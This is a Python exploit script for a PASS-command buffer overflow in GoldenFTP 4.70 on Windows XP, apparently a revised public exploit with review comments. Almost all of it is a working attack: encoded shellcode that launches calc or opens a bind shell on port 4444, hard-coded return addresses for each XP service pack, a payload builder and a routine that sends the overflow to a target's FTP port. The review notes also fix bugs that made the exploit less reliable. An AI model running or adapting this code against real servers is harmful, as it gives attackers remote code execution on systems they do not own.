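#!/usr/bin/python
#
# Exploit Title: GoldenFTP 4.70 PASS overflow exploit (v2.5)
# Date: July 8, 2011
# Author: Joff Thyer ([email protected])
# Software Link: http://www.goldenftpserver.com/
# Version: 4.70
# Tested on: WinXP-SP0/SP2/SP3
# CVE: 2006-6576
#
# based on exploit by:
# Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#
# You must make sure that the "Show new connections" option is enabled
# in order for this exploit to work.
#
# Notes:
# Specifying the IP source address is used in the calculation of the
# overflow buffer offset. It is important that the source address
# be specified correctly.
#
# Review notes for this revision:
# - Runs under Python 2.6+ and Python 3: bytes literals throughout,
#   print as a function, no backtick repr.
# - The payload is built by build_payload() so it can be checked without
#   touching the network; the network part only runs under __main__.
# - Unknown <shellcode>/<platform> values are rejected with a message.
#   Previously an unknown shellcode silently fell back to calc and an
#   unknown platform crashed with a NameError on `jmpesi`.
# - The socket has a timeout, uses sendall() (send() may write a short
#   buffer), and is closed on every path; connection failures exit 1.
# - The netstat helper waits for the child (no zombie) and uses a raw
#   regex string.
# - The return addresses are hard-coded kernel32.dll offsets for specific
#   XP service-pack builds. They depend on the exact binary (language
#   edition, patch level), so verify them against the target before use.
# - This is attack tooling: only run it against systems you are
#   authorised to test.
from __future__ import print_function

import re
import socket
import sys
import time
from subprocess import PIPE, Popen

# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
# The bad-character list matters: the PASS line below is terminated with
# "\n", so the encoded shellcode must not contain 0x0a (nor NUL / CR).
calc = (
    b"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9"
    b"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0"
    b"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d"
    b"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56"
    b"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae"
    b"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69"
    b"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63"
    b"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37"
    b"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6"
    b"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59"
    b"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e"
    b"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45"
    b"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b"
    b"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd"
    b"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f"
    b"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4"
    b"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27"
    b"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6"
    b"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda"
    b"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f"
    b"\x88"
)

# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# 422 bytes
# NOTE(review): the command line above is reproduced from the original
# header as-is; "windows/exec CMD=windows/shell_bind_tcp" is almost
# certainly a typo for the windows/shell_bind_tcp payload -- the listener
# check at the end of this script looks for port 4444, that payload's
# default LPORT. Regenerate if in doubt.
cmdshell = (
    b"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9"
    b"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5"
    b"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e"
    b"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66"
    b"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98"
    b"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb"
    b"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae"
    b"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10"
    b"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0"
    b"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73"
    b"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a"
    b"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78"
    b"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc"
    b"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc"
    b"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38"
    b"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e"
    b"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26"
    b"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70"
    b"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25"
    b"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd"
    b"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d"
    b"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8"
    b"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33"
    b"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f"
    b"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70"
    b"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2"
    b"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85"
    b"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8"
    b"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6"
    b"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4"
    b"\x8c\xc7"
)

# Payload selected by the <shellcode> argument.
SHELLCODES = {"calc": calc, "shell": cmdshell}

# Return address: a JMP ESI inside kernel32.dll, per XP service pack.
# Hard-coded absolute addresses; they only hold for the exact kernel32
# build they were taken from (no ASLR on XP, but language editions and
# patch levels differ). Verify before use.
JMP_ESI = {
    "sp0": b"\x7b\x15\xe8\x77",
    "sp2": b"\xc3\x72\x85\x7c",
    "sp3": b"\x0b\xda\x82\x7c",
}

# Sent as a bare line before USER/PASS: four NOPs then a short jump
# forward (EB 20). Kept byte-for-byte from the original exploit; the
# trailing 0x0a is the line terminator and is deliberate.
SHORTJMP = b"\x90\x90\x90\x90\xeb\x20\n"
NOPSLED = b"\x90" * 60

# Distance, in bytes, that the original exploit measured from the start
# of the source-address text to the saved return address. The header's
# note that the source address "is used in the calculation of the
# overflow buffer offset" is why len(srcaddr) is subtracted -- presumably
# the server writes the connecting address ahead of the overflowed data
# when "Show new connections" is on; this script cannot verify that.
OVERFLOW_OFFSET = 533
FTP_PORT = 21
BIND_SHELL_PORT = 4444  # default LPORT of the bind-shell payload


def build_payload(srcaddr, shellcode, platform):
    """Build the PASS argument that overflows the buffer.

    Layout: NOP sled, shellcode, 'A' padding up to OVERFLOW_OFFSET minus
    the source-address length, then the JMP ESI return address.

    srcaddr   -- dotted-quad address of the attacking host; only its
                 length feeds the offset calculation
    shellcode -- "calc" or "shell"
    platform  -- "sp0", "sp2" or "sp3"

    Returns the payload as bytes.

    Raises ValueError for an unknown shellcode or platform, or when the
    sled plus shellcode would not fit in front of the return address
    (the original silently produced a short, non-working buffer then).
    """
    try:
        buf = SHELLCODES[shellcode]
    except KeyError:
        raise ValueError("unknown shellcode %r (expected calc|shell)" % (shellcode,))
    try:
        jmpesi = JMP_ESI[platform]
    except KeyError:
        raise ValueError("unknown platform %r (expected sp0|sp2|sp3)" % (platform,))
    pad_len = OVERFLOW_OFFSET - (len(srcaddr) + len(buf) + len(NOPSLED))
    if pad_len < 0:
        raise ValueError(
            "NOP sled + shellcode exceed the overflow offset by %d bytes" % -pad_len
        )
    return NOPSLED + buf + b"A" * pad_len + jmpesi


def usage(prog):
    """Print the command-line usage text."""
    print("[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % prog)
    print("\tshellcode = (calc|shell)")
    print("\tplatform = (sp0|sp2|sp3)")
    print("\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2")


def send_exploit(target, payload, timeout=10.0):
    """Connect to the FTP service on `target` and deliver `payload`.

    Sends SHORTJMP, then "USER anonymous", then "PASS <payload>", reads
    (and discards) at most one response and sleeps 2 s so the target has
    time to run the shellcode before the socket is torn down.

    Raises socket.error (OSError on Python 3) if the connection or a send
    fails. A timeout on the final recv() is swallowed: a crashed or
    hijacked server may never answer, and that is not a failure here.
    The socket is always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((target, FTP_PORT))
        print("[+] Sending payload, length = %d" % len(payload))
        # sendall() rather than send(): send() may write only part of the
        # buffer, which would truncate the overflow.
        s.sendall(SHORTJMP)
        s.sendall(b"USER anonymous\n")
        s.sendall(b"PASS " + payload + b"\n")
        try:
            s.recv(1024)
        except socket.timeout:
            pass
        print("[+] Sleeping 2 secs...")
        time.sleep(2)
    finally:
        s.close()


def local_listener_line(port):
    """Return the `netstat -na` line for a TCP listener on 0.0.0.0:<port>.

    Returns None when no such line is present. Only meaningful when the
    exploit was run against the local machine (the bind shell would be
    listening here). Uses communicate() so the child is reaped.
    """
    proc = Popen(["netstat", "-na"], stdout=PIPE, shell=False)
    out = proc.communicate()[0].decode("ascii", "replace")
    match = re.search(r"TCP\s*0\.0\.0\.0:%d.*LISTENING" % port, out)
    return match.group(0) if match else None


def main(argv):
    """Command-line entry point; returns the process exit status.

    Exit status is 0 on success or when usage is printed, 1 on a bad
    argument or a failed connection (the original exited 0 in every case).
    """
    if len(argv) < 5:
        usage(argv[0])
        return 0
    srcaddr, target, shellcode, platform = argv[1:5]

    try:
        payload = build_payload(srcaddr, shellcode, platform)
    except ValueError as exc:
        print("[-] " + str(exc))
        usage(argv[0])
        return 1

    print("[+] Golden FTP PASS Exploit")
    print("[+] Version 2.5, July 8 2011")
    print("[+] Author: Joff Thyer ([email protected])")
    print("[+] 'Show new connections' must be enabled in GoldenFTP in order")
    print("[+] for this exploit to succeed!")
    print("[+] Connecting: " + target)

    try:
        send_exploit(target, payload)
    except socket.error as exc:
        print("[-] Connection to " + target + " failed! (" + str(exc) + ")")
        return 1

    # When exploiting ourselves with the bind shell, confirm the listener.
    if shellcode == "shell" and srcaddr == target:
        line = local_listener_line(BIND_SHELL_PORT)
        if line:
            print("[+] " + line)
    print("[+] Done.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))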